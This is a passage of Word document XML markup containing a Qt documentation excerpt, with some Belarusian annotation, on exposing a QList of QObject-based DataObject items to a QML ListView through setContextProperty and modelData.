          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> color READ color WRITE setColor NOTIFY colorChanged</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</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char</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argv</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QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</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argc</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argv</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QList</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObject</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dataList</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dataList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append</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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DataObject</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"Item 1"</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"red"</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dataList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append</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</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DataObject</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"Item 2"</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"green"</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dataList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append</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</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DataObject</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"Item 3"</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"blue"</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dataList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append</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</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DataObject</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"Item 4"</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"yellow"</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QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</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view</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setResizeMode</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QQuickView</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SizeRootObjectToView</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QQmlContext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ctxt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view</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rootContext</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ctxt</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setContextProperty</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"myModel"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QVariant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fromValue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dataList</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2617" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>* is available as the</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modelData</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property. As a convenience, the properties of the object are also made available directly in the delegate's context. Here,</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view.qml</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>references the</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DataModel</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties in the</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2618" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate:</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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width</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100</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height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100</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myModel</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delegate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Rectangle</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height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25</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width</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100</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color</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modelData</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color</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Text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text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name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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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AC1824" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="0088121D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">te the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E46B36">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use of</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00E46B36">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E46B36">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00E46B36">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E46B36">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property with </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qualifier</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The properties of the object are not replicated in the</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object, as they are easily available via the</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modelData</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object.</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46B36">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00E46B36">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>Дадзены</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00E46B36">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00E46B36">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>мадэл</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00E46B36">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>і можна выкарыстоўваць дл</w:t>
      </w:r>
      <w:r w:rsidR="00E46B36" w:rsidRPr="00E46B36">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>я афармлення знешнасці дэлегата //</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The complete source code for this example is available in</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2619" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>examples/quick/models/objectlistmodel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>within the Qt install directory.</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AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: There is no way for the view to know that the contents of a</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2620" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has changed. If the</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2621" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes, it is necessary to reset the model by calling</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2622" w:anchor="setContextProperty" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlContext::setContextProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="00E46B36">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2354" w:name="qabstractitemmodel-subclass"/>
      <w:bookmarkStart w:id="2355" w:name="_Toc483001037"/>
      <w:bookmarkStart w:id="2356" w:name="_Toc483004028"/>
      <w:bookmarkStart w:id="2357" w:name="_Toc483604378"/>
      <w:bookmarkStart w:id="2358" w:name="_Toc483605598"/>
      <w:bookmarkEnd w:id="2354"/>
      <w:r w:rsidRPr="00E46B36">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QAbstractItemModel subclass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2355"/>
      <w:bookmarkEnd w:id="2356"/>
      <w:bookmarkEnd w:id="2357"/>
      <w:bookmarkEnd w:id="2358"/>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 xml:space="preserve">A model can be defined by </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
